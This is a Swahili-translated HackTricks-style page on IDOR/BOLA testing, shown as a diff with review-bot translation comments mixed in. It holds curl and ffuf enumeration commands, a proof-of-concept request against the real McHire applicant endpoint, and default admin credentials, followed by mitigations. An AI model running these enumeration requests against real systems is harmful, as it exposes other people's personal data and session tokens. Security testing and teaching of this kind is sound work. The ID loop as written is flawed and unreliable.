5. Tumia **sehemu ya kuthibitishwa ya chini ya haki** na badilisha tu ID **ukihifadhi token/cookie ile ile**. Kukosekana kwa kosa la uthibitisho kawaida ni ishara ya IDOR.
1. Tafuta **vigezo vinavyorejea kitu**:
* Path: `/api/user/1234`, `/files/550e8400-e29b-41d4-a716-446655440000`
* Query: `?id=42`, `?invoice=2024-00001`
* Body / JSON: `{"user_id": 321, "order_id": 987}`
* Headers / Cookies: `X-Client-ID: 4711`
2. Pendelea endpoints zinazofanya **kusoma au kusasisha** data (`GET`, `PUT`, `PATCH`, `DELETE`).
3. Tambua wakati vitambulisho ni **mfuatano au vinavyoweza kutabirika** kama ID yako ni `64185742`, basi `64185741` huenda ipo.
4. Chunguza njia zilizofichwa au mbadala (mfano *"Paradox team members"* link katika kurasa za kuingia) ambazo zinaweza kufichua API za ziada.
5. Tumia kikao chenye **uthibitishaji kilicho na ruhusa ndogo** na ubadilishe tu ID huku **ukiendelea kutumia token/cookie ile ile**. Kukosekana kwa kosa la idhini kwa kawaida ni dalili ya IDOR.
### Quick manual tampering (Burp Repeater)
```
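Review bot: in the added second paragraph, `kunyongwa udhibiti wa akaunti` mistranslates "full account takeover": `kunyongwa` means to be hanged or strangled. Use `kuchukuliwa kwa akaunti kabisa`, which matches the `Uchukuzi wa akaunti` wording used in the impact list further down in this same commit.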
@ -26,7 +27,7 @@ Content-Type: application/json
{"lead_id":64185741}
```
### Uainishaji wa otomatiki (Burp Intruder / curl loop)
### Orodhesho otomatiki (Burp Intruder / curl loop)
```bash
for id in $(seq 64185742 64185700); do
curl -s -X PUT 'https://www.example.com/api/lead/cem-xhr' \
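Review bot: the enumeration loop `for id in $(seq 64185742 64185700); do` produces no iterations, because GNU seq prints nothing when the first value is greater than the last and no negative increment is given; counting down needs `seq 64185742 -1 64185700`. Separately, the new heading `### Orodhesho otomatiki` uses a non-standard noun; `Uorodheshaji otomatiki` would match `uorodheshaji wa IDs` used in the mitigation list of this commit.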
@ -36,17 +37,36 @@ curl -s -X PUT 'https://www.example.com/api/lead/cem-xhr' \
done
```
---
## 2. Utafiti wa Kesi Halisi Jukwaa la Chatbot la McHire (2025)
Wakati wa tathmini ya lango la ajira la **McHire** lililofanywa na Paradox.ai, IDOR ifuatayo iligundulika:
### Oracle ya majibu ya makosa kwa user/file enumeration
Wakati endpoint ya download inakubali username na filename (mfano `/view.php?username=<u>&file=<f>`), tofauti ndogo katika ujumbe za makosa mara nyingi huunda oracle:
- Jina la mtumiaji lisilopo → "User not found"
- Filename mbaya lakini extension halali → "File does not exist" (mara nyingine pia huorodhesha available files)
- Extension mbaya → validation error
Kwa kikao chochote kilichothibitishwa, unaweza fuzz parameter ya username huku ukishikilia filename ya kawaida na kuchuja kwa string "user not found" ili kugundua watumiaji halali:
```bash
ffuf -u 'http://target/view.php?username=FUZZ&file=test.doc' \
-b 'PHPSESSID=<session-cookie>' \
-w /opt/SecLists/Usernames/Names/names.txt \
-fr 'User not found'
```
Mara tu majina halali ya watumiaji yanapotambuliwa, omba faili maalumu moja kwa moja (kwa mfano, `/view.php?username=amanda&file=privacy.odt`). Muundo huu kwa kawaida husababisha ufunuliwa bila idhini wa nyaraka za watumiaji wengine na uvuaji wa credentials.
---
## 2. Mfano wa Kesi Halisi McHire Chatbot Platform (2025)
Wakati wa tathmini ya portal ya ajira ya **McHire** inayotumia Paradox.ai, IDOR ifuatayo iligunduliwa:
* Endpoint: `PUT /api/lead/cem-xhr`
* Authorization: cookie ya kikao cha mtumiaji kwa akaunti ya mtihani ya **yoyote** ya mgahawa
* Body parameter: `{"lead_id": N}` kitambulisho cha nambari **za mpangilio** za tarakimu 8
* Authorization: cookie ya session ya mtumiaji kwa **any** akaunti ya mtihani ya mgahawa
* Body parameter: `{"lead_id": N}` kitambulisho cha nambari cha tarakimu 8, **mfuatano**
Kwa kupunguza `lead_id`, mtathmini alirejesha taarifa za waombaji **kamili za PII** (jina, barua pepe, simu, anwani, mapendeleo ya zamu) pamoja na **JWT** ya mtumiaji ambayo iliruhusu kuiba kikao. Uhesabuji wa anuwai `1 64,185,742` ulifunua takriban **milioni 64** za rekodi.
Kwa kupunguza `lead_id`, mtahasi alipata PII kamili za waombaji (jina, e-mail, simu, anwani, mapendeleo ya zamu) pamoja na JWT ya mteja iliyoruhusu session hijacking. Kuorodhesha anuwai `1 64,185,742` kulifunua takriban **64 million** rekodi.
Ombi la Ushahidi wa Dhihirisho:
Proof-of-Concept request:
```bash
curl -X PUT 'https://www.mchire.com/api/lead/cem-xhr' \
-H 'Content-Type: application/json' \
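Review bot: the rewritten McHire paragraph turns `mtathmini` (the assessor) into `mtahasi`, which is not a Swahili word; the removed line had the correct `mtathmini`, so restore it in the new sentence `Kwa kupunguza lead_id, mtathmini alipata PII kamili za waombaji ...`.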
@ -56,30 +76,31 @@ Combined with **default admin credentials** (`123456:123456`) that granted acces
---
## 3. Athari za IDOR / BOLA
* Kupanua kwa usawa soma/update/futa data za **watumiaji wengine**.
* Kupanua kwa wima mtumiaji mwenye mamlaka ya chini anapata kazi za kiutawala pekee.
* Uvunjaji wa data kwa wingi ikiwa vitambulisho ni vya mfululizo (mfano, vitambulisho vya waombaji, ankara).
* Kuchukua akaunti kwa kuiba tokeni au kuweka upya nywila za watumiaji wengine.
* Kupanda kwa usawa kusoma/kuhariri/kufuta **data za watumiaji wengine**.
* Kupanda kwa wima mtumiaji mwenye vibali vidogo anapata utendakazi unaotengwa kwa admin pekee.
* Uvujaji mkubwa wa data ikiwa vitenambulisho ni mfululizo (mfano: vitambulisho vya waombaji, ankara).
* Uchukuzi wa akaunti kwa kuiba tokens au kwa kuweka upya nywila za watumiaji wengine.
---
## 4. Njia za Kupunguza & Mbinu Bora
1. **Tekeleza ruhusa ya kiwango cha kitu** kwenye kila ombi (`user_id == session.user`).
2. Prefer **vitambulisho visivyoweza kudhaniwa** (UUIDv4, ULID) badala ya vitambulisho vya kuongezeka kiotomatiki.
3. Fanya ruhusa **seva upande**, usitegemee maeneo ya siri ya fomu au udhibiti wa UI.
4. Tekeleza **RBAC / ABAC** ukaguzi katika middleware kuu.
5. Ongeza **kikomo cha kiwango & ufuatiliaji** kugundua kuhesabu vitambulisho.
6. Jaribu usalama kila mwisho mpya (kitengo, muunganiko, na DAST).
## 4. Uzuiaji & Mbinu Bora
1. **Lazimisha idhinishaji kwa kiwango cha kipengee** kwenye kila ombi (`user_id == session.user`).
2. Pendelea **vitenambulisho visivyo vya moja kwa moja, visivyoweza kubahatishwa** (UUIDv4, ULID) badala ya auto-increment IDs.
3. Fanya idhinishaji upande wa server (server-side), usitegemee maeneo ya fomu yaliyofichwa au controls za UI.
4. Tekeleza ukaguzi wa **RBAC / ABAC** katika middleware ya kati.
5. Ongeza **rate-limiting & logging** kugundua uorodheshaji wa IDs.
6. Testi kiusalama kila endpoint mpya (unit, integration, na DAST).
---
## 5. Zana
* **BurpSuite extensions**: Authorize, Auto Repeater, Turbo Intruder.
* **OWASP ZAP**: Auth Matrix, Forced Browse.
* **Github projects**: `bwapp-idor-scanner`, `Blindy` (uwindaji wa IDOR kwa wingi).
* **Github projects**: `bwapp-idor-scanner`, `Blindy` (bulk IDOR hunting).
## Marejeleo
## Marejeo
* [McHire Chatbot Platform: Default Credentials and IDOR Expose 64M Applicants PII](https://ian.sh/mcdonalds)
* [OWASP Top 10 Broken Access Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)
* [How to Find More IDORs Vickie Li](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489)
* [HTB Nocturnal: IDOR oracle → file theft](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
{{#include ../banners/hacktricks-training.md}}
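Review bot: two of the added lines introduce the typo `vitenambulisho` (the third impact bullet, `ikiwa vitenambulisho ni mfululizo`, and mitigation item 2, `vitenambulisho visivyo vya moja kwa moja`); the replaced lines and the identification list earlier in this file spell it `vitambulisho`, so correct both occurrences.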